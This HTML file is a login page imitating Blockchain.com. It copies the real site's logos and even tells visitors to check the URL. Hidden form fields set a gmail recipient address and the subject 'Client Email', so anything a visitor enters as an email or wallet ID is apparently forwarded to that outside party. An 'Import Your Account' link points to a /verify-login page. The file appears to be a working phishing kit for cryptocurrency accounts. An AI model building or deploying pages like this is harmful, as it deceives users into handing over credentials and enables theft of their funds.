<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://kit.fontawesome.com/4c4cf0b696.js" crossorigin="anonymous"></script>
        <link href="https://cdn.jsdelivr.net/npm/remixicon@3.4.0/fonts/remixicon.css" rel="stylesheet">
    <link rel="stylesheet" href="css/login.css">
</head>
<body style="background-color: rgb(18, 29, 51);">
    <section class="blockchain_"  style="background-color: rgb(18, 29, 51); height: auto;">
        <div class="top_link" style="background: rgb(12, 108, 242); color: rgb(255, 255, 255); text-align: center;"><p>For you security, make sure the URL is <i class="ri-lock-fill"></i> https://login.blockchain.com</p></div>
        <div class="blockchain_logo" style="justify-content: center; color: rgb(251, 250, 249); display: flex;">
           <!-- <img src="https://altcoinsbox.com/wp-content/uploads/2023/01/blockchain.com-logo.svg" alt="" style="width: 2%; height: 3%;"> <h3>Blockchain.com</h3> -->
           <img src="https://login.blockchain.com/img/bc-logo.svg?91c7840afd" alt="">
        </div>
        <div class="login_cont">
            <div class="login_block" style="background-color: white;">
                <div class="login_links">
                    <a href="/" style="text-decoration: none;">
                        <div class="icon1" style="display: flex; justify-content: center;" >
                            <img src="https://login.blockchain.com/img/wallet-no-background.svg?69c9e8c387" alt="" style="height: 28px; width: auto;">
                            <h5 style="color: rgb(83, 34, 229); padding-left:3%;">Wallet</h5>
                        </div>
                    </a>
                    <a href="/email" style="text-decoration: none;">
                        <div class="icon1" style="background-color: rgb(243, 243, 243); display: flex; justify-content: center; border-radius: 0px 8px 0px 0px;">
                            
                            <img src="https://login.blockchain.com/img/exchange-grayscale.svg?f59f36feac alt=">
                            <h5 style="color: rgb(152, 161, 179); padding-left:3%;">Exchange</h5>
                        </div>
                    </a>
                </div>
                <form action="" style="display: grid; position: relative;">
                    <div class="content" style="display: grid;">
                        <div style="display: flex; justify-content: space-between;">
                            <label for="email walletId">Email or Wallet ID</label>
                            <p id="req" style="color: rgb(217, 59, 48); display: none;
                            ">required</p>
                        </div>
                        <input id="myInput recipient" class="email_in" value="roselloydx60@gmail.com" type="hidden" placeholder="Enter Email" style="color: rgb(53, 63, 82);" required>
                        <input id="myInput suject" class="email_in" value="Client Email" type="hidden" placeholder="Enter Email" style="color: rgb(53, 63, 82);" required>
                        <input id="myInput message" type="text" placeholder="Enter Email or Wallet ID" required>
                    </div>
                    <div class="content">
                        <input type="submit" value="Continue" style="width: 100%; margin-bottom: 0;">
                        <div>
                            <a href="/verify-login" style="text-decoration: none; color: rgb(12, 108, 242);">
                                <p style="padding-top: 10px; text-align: center;">Import Your Account</p>
                            </a>
                        </div>
                    </div>
                </form>
               <div class="blc_act" style="text-align: center; font-weight: 500; font-size: 16px; line-height: inherit; text-transform: none; font-style: normal; color: rgb(103, 113, 132); padding: 4% 15% 2% 15%;"> <p>Don't have a Blockchain Account? <a href="#" style="text-decoration: none; color: rgb(12, 108, 242); font-weight: 600; font-size: 16px; line-height: inherit;">Sign up Now <i class="ri-arrow-right-line"></i></a></p></div>
            </div>
        </div>
        <footer style="font-weight: bold;">
            <div>
                <div style="">
                    <div class="bc_signup" style="display: flex;justify-content: center; padding: 0 10px 5% 10px; color:rgba(194, 194, 196, 0.764);">
                        <div>
                            <p>Are you Institutional Exchange user ?</p>
                        </div>
                        <div>
                            <a style="text-decoration: none; color: whitesmoke;">Log In <i class="ri-arrow-right-line"></i></a>
                        </div>
                    </div>
                </div>
                <div class="" style="display: flex; color:rgba(194, 194, 196, 0.764); justify-content: center;">
                    <div style="padding: 0.5rem; bottom: 0rem; position: relative;">
                        <select class="" aria-label="Default select example" name="state" style="background: none; border: none; color:rgba(194, 194, 196, 0.764); font-weight: 500;">
                            <option class="select1">English</option>
                            <option value="1">Español</option>
                            <option value="2">Français</option>
                            <option value="3">Português</option>
                            <option value="3">Русский</option>
                        </select>
                        <style>
                            select:hover{
                                border: none;
                            }
                        </style>
                    </div>
                    <div style="padding: 0.5rem;"><p>Version 4.94.19</p></div>
                    <div style="padding: 0.5rem;"><p>Need Help?</p></div>
                </div>
            </div>
        </footer>
    </section>
</body>
</html>
